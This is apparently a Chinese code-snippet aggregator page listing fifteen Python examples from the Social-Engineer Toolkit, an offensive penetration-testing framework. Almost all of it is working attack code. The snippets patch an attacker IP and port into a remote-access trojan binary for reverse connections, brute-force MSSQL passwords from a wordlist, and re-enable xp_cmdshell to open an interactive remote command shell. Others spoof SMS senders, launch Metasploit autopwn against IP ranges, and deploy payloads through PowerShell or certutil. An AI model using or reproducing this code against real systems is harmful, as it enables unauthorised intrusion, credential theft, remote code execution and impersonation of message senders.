本文整理汇总了Python中src.core.setcore.print_status函数的典型用法代码示例。如果您正苦于以下问题:Python print_status函数的具体用法?Python print_status怎么用?Python print_status使用的例子?那么恭喜您, 这里精选的函数代码示例或许可以为您提供帮助。
在下文中一共展示了print_status函数的15个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于系统推荐出更棒的Python代码示例。
示例1: prepare_ratte
def prepare_ratte(ipaddr,ratteport, persistent,customexe):
core.print_status("preparing RATTE...")
# replace ipaddress with one that we need for reverse connection back
############
#Load content of RATTE
############
fileopen=open("src/payloads/ratte/ratte.binary" , "rb")
data=fileopen.read()
fileopen.close()
############
#PATCH Server IP into RATTE
############
filewrite=open("src/program_junk/ratteM.exe", "wb")
host=int(len(ipaddr)+1) * "X"
rPort=int(len(str(ratteport))+1) * "Y"
pers=int(len(str(persistent))+1) * "Z"
#check ob cexe > 0, sonst wird ein Feld gepatcht (falsch!)
if len(str(customexe)) > 0:
cexe=int(len(str(customexe))+1) * "Q"
else:
cexe=""
filewrite.write(data.replace(str(cexe), customexe+"\x00", 1).replace(str(pers), persistent+"\x00", 1).replace(str(host), ipaddr+"\x00", 1).replace(str(rPort), str(ratteport)+"\x00", 1) )
filewrite.close()
示例2: brute
def brute(ipaddr, username, port, wordlist):
# if ipaddr being passed is invalid
if ipaddr == "":
return False
if ":" in ipaddr:
ipaddr = ipaddr.split(":")
ipaddr, port = ipaddr
ipaddr = str(ipaddr)
port = str(port)
# base counter for successful brute force
counter = 0
# build in quick wordlist
if wordlist == "default":
wordlist = "src/fasttrack/wordlist.txt"
# read in the file
successful_password = None
with open(wordlist) as passwordlist:
for password in passwordlist:
password = password.rstrip()
# try actual password
try:
# connect to the sql server and attempt a password
print("Attempting to brute force {bold}{ipaddr}:{port}{endc}"
" with username of {bold}{username}{endc}"
" and password of {bold}{passwords}{endc}".format(ipaddr=ipaddr,
username=username,
passwords=password,
port=port,
bold=core.bcolors.BOLD,
endc=core.bcolors.ENDC))
target_server = _mssql.connect("{0}:{1}".format(ipaddr, port),
username,
password)
if target_server:
core.print_status("\nSuccessful login with username {0} and password: {1}".format(username,
password))
counter = 1
successful_password = password
break
# if login failed or unavailable server
except:
pass
# if we brute forced a machine
if counter == 1:
return ",".join([ipaddr, username, port, successful_password])
# else we didnt and we need to return a false
else:
if ipaddr:
core.print_warning("Unable to guess the SQL password for {0} with username of {1}".format(ipaddr, username))
return False
示例3: cmdshell
def cmdshell(ipaddr, port, username, password, option):
# connect to SQL server
mssql = _mssql.connect(ipaddr + ":" + str(port), username, password)
setcore.print_status("Connection established with SQL Server...")
setcore.print_status("Attempting to re-enable xp_cmdshell if disabled...")
try:
mssql.execute_query("EXEC master.dbo.sp_configure 'show advanced options', 1")
mssql.execute_query("RECONFIGURE")
mssql.execute_query("EXEC master.dbo.sp_configure 'xp_cmdshell', 1")
mssql.execute_query("RECONFIGURE")
except Exception, e:
pass
示例4: _do_sms
def _do_sms():
print("""\n ----- The Social-Engineer Toolkit (SET) SMS Spoofing Attack Vector -----\n""")
print("This attack vector relies upon a third party service called www.spoofmytextmessage.com. "
"This is a third party service outside of the control from the Social-Engineer Toolkit. "
"The fine folks over at spoofmytextmessage.com have provided an undocumented API for us "
"to use in order to allow SET to perform the SMS spoofing. You will need to visit "
"https://www.spoofmytextmessage.com and sign up for an account. They example multiple "
"payment methods such as PayPal, Bitcoin, and many more options. Once you purchase your "
"plan that you want, you will need to remember your email address and password used for "
"the account. SET will then handle the rest.\n")
print("In order for this to work you must have an account over at spoofmytextmessage.com\n")
print("Special thanks to Khalil @sehnaoui for testing out the service for me and finding "
"spoofmytextmessage.com\n")
core.print_error("DISCLAIMER: By submitting yes, you understand that you accept all terms and "
"services from spoofmytextmessage.com and you are fully aware of your countries "
"legal stance on SMS spoofing prior to performing any of these. By accepting yes "
"you fully acknowledge these terms and will not use them for unlawful purposes.")
message = input("\nDo you accept these terms (yes or no): ")
if message == "yes":
core.print_status("Okay! Moving on - SET needs some information from you in order to spoof the message.")
email = input(core.setprompt(["7"], "Enter your email address for the spoofmytextmessage.com account"))
core.print_status("Note that the password below will be masked and you will not see the output.")
pw = getpass.getpass(core.setprompt(["7"], "Enter your password for the spoofmytextmessage.com account"))
core.print_status("The next section requires a country code, this is the code you would use to dial "
"to the specific country, for example if I was sending a message to 555-555-5555 to "
"the United States (or from) you would enter +1 below.")
tocountry = input(core.setprompt(["7"], "Enter the country code for the number you are sending TO "
"(for example U.S would be '+1')[+1]"))
if tocountry == "":
tocountry = "+1"
fromcountry = input(core.setprompt(["7"], "Enter the country code for the number you are sending FROM "
"(for example U.S. would be '+1')[+1]"))
if fromcountry == "":
fromcountry = "+1"
tonumber = input(core.setprompt(["7"], "Enter the number to send the SMS TO - be sure to include "
"country code (example: +15551234567)"))
fromnumber = input(core.setprompt(["7"], "Enter the number you want to come FROM - be sure to include "
"country code (example: +15551234567)"))
message = input(core.setprompt(["7"], "Enter the message you want to send via the text message"))
# note that the function for this is in a compiled python file with no source -
# this was done at the request of the third party we use since the API is not documented.
# I hand wrote the code and can validate its authenticity - it imports python requests
# and json and uses that to interact with the API. From a security standpoint if you are
# uncomfortable using this - feel free to ping me and I can walk you through what I do
# without giving away the API from the third party.
from src.sms.protectedapi import send_sms
send_sms(email, pw, tocountry, fromcountry, fromnumber, tonumber, message)
else:
core.print_status("Okay! Exiting out of the Social-Engineer Toolkit SMS Spoofing Attack Vector...")
示例5: gen_qrcode
def gen_qrcode(url):
# generate the qrcode
qr = qrcode.QRCode(5, error_correction=qrcode.constants.ERROR_CORRECT_L)
qr.add_data(url)
qr.make()
im = qr.make_image()
time.sleep(1)
qr_img_path = os.path.join(core.setdir, "reports/qrcode_attack.png")
if os.path.isfile(qr_img_path):
os.remove(qr_img_path)
# save the image out
im.save(qr_img_path, format='png')
# print that its been successful
core.print_status("QRCode has been generated under {0}".format(qr_img_path))
示例6: launch
def launch():
""" here we cant use the path for metasploit via setcore.meta_path. If the full path is specified it breaks
database support for msfconsole for some reason. reported this as a bug, may be fixed soon... until then
if path variables aren't set for msfconsole this will break, even if its specified in set_config """
# launch the attack
core.print_status("Launching Metasploit and attacking the systems specified. This may take a moment..")
# try/catch block
try:
child = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(core.meta_path + 'msfconsole'),
os.path.join(core.userconfigpath, "autopwn.answer")))
child.interact()
# handle exceptions and log them
except Exception as error:
core.log(error)
示例7: prep
def prep(database, ranges):
print("\n")
core.print_status("Prepping the answer file based on what was specified.")
# prep the file to be written
with open("src/program_junk/autopwn.answer", "w") as filewrite:
core.print_status("Using the {0} sql driver for autopwn".format(database))
filewrite.write("db_driver {0}\r\n".format(database))
core.print_status("Autopwn will attack the following systems: {0}".format(ranges))
filewrite.write("db_nmap {0}\r\n".format(ranges))
filewrite.write("db_autopwn -p -t -e -r\r\n")
filewrite.write("jobs -K\r\n")
filewrite.write("sessions -l\r\n")
core.print_status("Answer file has been created and prepped for delivery into Metasploit.\n")
示例8: cmdshell
def cmdshell(ipaddr,port,username,password,option):
# connect to SQL server
mssql = _mssql.connect(ipaddr + ":" + str(port), username, password)
setcore.print_status("Connection established with SQL Server...")
setcore.print_status("Attempting to re-enable xp_cmdshell if disabled...")
try:
mssql.execute_query("EXEC master.dbo.sp_configure 'show advanced options', 1")
mssql.execute_query("RECONFIGURE")
mssql.execute_query("EXEC master.dbo.sp_configure 'xp_cmdshell', 1")
mssql.execute_query("RECONFIGURE")
except Exception, e: pass
setcore.print_status("Enter your Windows Shell commands in the xp_cmdshell - prompt...")
mssql.select_db('master')
while 1:
# cmdshell command
cmd = raw_input("xp_cmdshell> ")
# exit if we want
if cmd == "quit" or cmd == "exit": break
mssql.execute_query("xp_cmdshell '%s'" % (cmd))
if cmd != "":
for line in mssql:
# formatting for mssql output
line = str(line)
line = line.replace("', 'output': '", "\n")
line = line.replace("{0: '", "")
line = line.replace("'}", "")
line = line.replace("{0: None, 'output': None}", "")
line = line.replace("\\r", "")
line = line.replace("The command completed with one or more errors.", "")
print line
示例9: cmdshell
def cmdshell(ipaddr, port, username, password, option):
# connect to SQL server
mssql = tds.MSSQL(ipaddr, int(port))
mssql.connect()
mssql.login("master", username, password)
core.print_status("Connection established with SQL Server...")
core.print_status("Attempting to re-enable xp_cmdshell if disabled...")
try:
mssql.sql_query("exec master.dbo.sp_configure 'show advanced options',1;"
"RECONFIGURE;"
"exec master.dbo.sp_configure 'xp_cmdshell', 1;"
"RECONFIGURE;")
except:
pass
core.print_status("Enter your Windows Shell commands in the xp_cmdshell - prompt...")
while True:
# prompt mssql
cmd = input("mssql>")
# if we want to exit
if cmd == "quit" or cmd == "exit":
break
# if the command isnt empty
elif cmd:
# execute the command
mssql.sql_query("exec master..xp_cmdshell '{0}'".format(cmd))
# print the rest of the data
mssql.printReplies()
mssql.colMeta[0]['TypeData'] = 80 * 2
mssql.printRows()
示例10: brute
def brute(ipaddr, username, port, wordlist):
# if ipaddr being passed is invalid
if ipaddr == "":
return False
if ipaddr != "":
# base counter for successful brute force
counter = 0
# build in quick wordlist
if wordlist == "default":
wordlist = "src/fasttrack/wordlist.txt"
# read in the file
password = file(wordlist, "r")
for passwords in password:
passwords = passwords.rstrip()
# try actual password
try:
print "Attempting to brute force " + setcore.bcolors.BOLD + ipaddr + setcore.bcolors.ENDC + " with username of " + setcore.bcolors.BOLD + username + setcore.bcolors.ENDC + " and password of " + setcore.bcolors.BOLD + passwords + setcore.bcolors.ENDC
# connect to the sql server and attempt a password
target_server = _mssql.connect(ipaddr + ":" + str(port), username, passwords)
# print that we were successful
setcore.print_status("\nSuccessful login with username %s and password: %s" % (username, passwords))
counter = 1
break
# if invalid password
except Exception, e:
pass
# if we brute forced a machine
if counter == 1:
return ipaddr + "," + username + "," + str(port) + "," + passwords
# else we didnt and we need to return a false
else:
if ipaddr != "":
setcore.print_warning(
"Unable to guess the SQL password for %s with username of %s" % (ipaddr, username)
)
return False
示例11: prepare_ratte
def prepare_ratte(ipaddr, ratteport, persistent, customexe):
core.print_status("preparing RATTE...")
# replace ipaddress with one that we need for reverse connection back
############
# Load content of RATTE
############
with open("src/payloads/ratte/ratte.binary", "rb") as fileopen:
data = fileopen.read()
############
# PATCH Server IP into RATTE
############
with open(os.path.join(userconfigpath, "ratteM.exe"), 'wb') as filewrite:
host = (len(ipaddr) + 1) * "X"
r_port = (len(str(ratteport)) + 1) * "Y"
pers = (len(str(persistent)) + 1) * "Z"
# check ob cexe > 0, sonst wird ein Feld gepatcht (falsch!)
if customexe:
cexe = (len(str(customexe)) + 1) * "Q"
else:
cexe = ""
filewrite.write(data.replace(cexe, customexe + "\x00", 1).replace(pers, persistent + "\x00", 1).replace(host, ipaddr + "\x00", 1).replace(r_port, str(ratteport) + "\x00", 1))
示例12: open
pass
# see if we are tracking emails
track_email = core.check_config("TRACK_EMAIL_ADDRESSES=").lower()
# grab the randomized applet name
applet_name = core.check_options("APPLET_NAME=")
if applet_name == "":
applet_name = core.generate_random_string(6, 15) + ".jar"
core.update_options("APPLET_NAME=" + applet_name)
# define if we are using a custom payload
custom = 0
if core.check_options("CUSTOM_EXE="):
custom = 1
core.print_status("Note that since you are using a custom payload, you will need to create your OWN listener.")
core.print_status("SET has no idea what type of payload you are using, so you will need to set this up manually.")
core.print_status("If using a custom Metasploit payload, setup a multi/handler, etc. to capture the connection back.")
# here we need to modify the java applet to recognize custom attribute
with open(os.path.join(core.setdir, "web_clone/index.html")) as fileopen:
data = fileopen.read()
with open(os.path.join(core.setdir, "web_clone/index.html.new"), "w") as filewrite:
# we randomize param name so static sigs cant be used
goat_random = core.generate_random_string(4, 4)
data = data.replace('param name="8" value="YES"', 'param name="8" value="{0}"'.format(goat_random))
filewrite.write(data)
subprocess.Popen("mv {0} {1}".format(os.path.join(core.setdir, "web_clone/index.html.new"),
示例13: file
# if we selected RATTE in our payload selection
if payload_selection == "RATTE":
fileopen = file("src/payloads/ratte/ratte.binary", "rb")
data = fileopen.read()
filewrite = open("src/program_junk/msf.exe", "wb")
host = int(len(ipaddr)+1) * "X"
rPort = int(len(str(port))+1) * "Y"
filewrite.write(data.replace(str(host), ipaddr+"\x00", 1))
filewrite.close()
fileopen = open("src/program_junk/msf.exe", "rb")
data = fileopen.read()
filewrite = open("src/program_junk/msf.exe", "wb")
filewrite.write(data.replace(str(rPort), str(port)+"\x00", 1))
filewrite.close()
setcore.print_status("Done, moving the payload into the action.")
if upx_encode == "ON" or upx_encode == "on":
# core upx
pass #setcore.upx("src/program_junk/msf.exe")
if os.path.isfile("src/program_junk/web_clone/msf.exe"):
os.remove("src/program_junk/web_clone/msf.exe")
if os.path.isfile("src/program_junk/msf.exe"):
shutil.copyfile("src/program_junk/msf.exe", "src/program_junk/web_clone/msf.exe")
if payload_selection == "SETSHELL":
if os.path.isfile("%s/src/program_junk/web_clone/x" %(definepath)):
os.remove("%s/src/program_junk/web_clone/x" % (definepath))
shutil.copyfile("%s/src/payloads/set_payloads/shell.windows" % (definepath), "%s/src/program_junk/web_clone/x" % (definepath))
示例14: print
"plan that you want, you will need to remember your email address and password used for "
"the account. SET will then handle the rest.\n")
print("In order for this to work you must have an account over at spoofmytextmessage.com\n")
print("Special thanks to Khalil @sehnaoui for testing out the service for me and finding "
"spoofmytextmessage.com\n")
core.print_error("DISCLAIMER: By submitting yes, you understand that you accept all terms and "
"services from spoofmytextmessage.com and you are fully aware of your countries "
"legal stance on SMS spoofing prior to performing any of these. By accepting yes "
"you fully acknowledge these terms and will not use them for unlawful purposes.")
message = input("\nDo you accept these terms (yes or no): ")
if message == "yes":
core.print_status("Okay! Moving on - SET needs some information from you in order to spoof the message.")
email = input(core.setprompt(["7"], "Enter your email address for the spoofmytextmessage.com account"))
pw = input(core.setprompt(["7"], "Enter your password for the spoofmytextmessage.com account"))
core.print_status("The next section requires a country code, this is the code you would use to dial "
"to the specific country, for example if I was sending a message to 555-555-5555 to "
"the United States (or from) you would enter +1 below.")
tocountry = input(core.setprompt(["7"], "Enter the country code for the number you are sending TO "
"(for example U.S would be '+1')[+1]"))
if tocountry == "":
tocountry = "+1"
fromcountry = input(core.setprompt(["7"], "Enter the country code for the number you are sending FROM "
"(for example U.S. would be '+1')[+1]"))
if fromcountry == "":
fromcountry = "+1"
示例15: deploy_hex2binary
def deploy_hex2binary(ipaddr, port, username, password):
# base variable used to select payload option
option = None
choice1 = "1"
conn = _mssql.connect("{0}:{1}".format(ipaddr, port),
username,
password)
core.print_status("Enabling the xp_cmdshell stored procedure...")
try:
conn.execute_query("exec master.dbo.sp_configure 'show advanced options',1;"
"GO;"
"RECONFIGURE;"
"GO;"
"exec master.dbo.sp_configure 'xp_cmdshell', 1;"
"GO;"
"RECONFIGURE;"
"GO")
except:
pass
# just throw a simple command via powershell to get the output
try:
print("""Pick which deployment method to use. The first is PowerShell and should be used on any modern operating system. The second method will use the certutil method to convert a binary to a binary.\n""")
choice = input("Enter your choice:\n\n"
"1.) Use PowerShell Injection (recommended)\n"
"2.) Use Certutil binary conversion\n\n"
"Enter your choice [1]:")
if choice == "":
choice = "1"
if choice == "1":
core.print_status("Powershell injection was selected to deploy to the remote system (awesome).")
option_ps = input("Do you want to use powershell injection? [yes/no]:")
if option_ps.lower() == "" or option_ps == "y" or option_ps == "yes":
option = "1"
core.print_status("Powershell delivery selected. Boom!")
else:
option = "2"
# otherwise, fall back to the older version using debug conversion via hex
else:
core.print_status("Powershell not selected, using debug method.")
option = "2"
except Exception as err:
print(err)
payload_filename = None
# if we don't have powershell
if option == "2":
# give option to use msf or your own
core.print_status("You can either select to use a default "
"Metasploit payload here or import your "
"own in order to deliver to the system. "
"Note that if you select your own, you "
"will need to create your own listener "
"at the end in order to capture this.\n\n")
choice1 = input("1.) Use Metasploit (default)\n"
"2.) Select your own\n\n"
"Enter your choice[1]:")
if choice1 == "":
choice1 = "1"
if choice1 == "2":
attempts = 0
while attempts <= 2:
payload_filename = input("Enter the path to your file you want to deploy to the system (ex /root/blah.exe):")
if os.path.isfile(payload_filename):
break
else:
core.print_error("File not found! Try again.")
attempts += 1
else:
core.print_error("Computers are hard. Find the path and try again. Defaulting to Metasploit payload.")
choice1 = "1"
if choice1 == "1":
web_path = None
#prep_powershell_payload()
import src.core.payloadgen.create_payloads
# if we are using a SET interactive shell payload then we need to make
# the path under web_clone versus ~./set
if os.path.isfile(os.path.join(core.setdir + "set.payload")):
web_path = os.path.join(core.setdir + "web_clone")
# then we are using metasploit
else:
if operating_system == "posix":
web_path = core.setdir
# if it isn't there yet
if not os.path.isfile(core.setdir + "1msf.exe"):
# move it then
subprocess.Popen("cp %s/msf.exe %s/1msf.exe" %
(core.setdir, core.setdir), shell=True).wait()
subprocess.Popen("cp %s/1msf.exe %s/ 1> /dev/null 2> /dev/null" %
(core.setdir, core.setdir), shell=True).wait()
subprocess.Popen("cp %s/msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null" %
(core.setdir, core.setdir), shell=True).wait()
#.........这里部分代码省略.........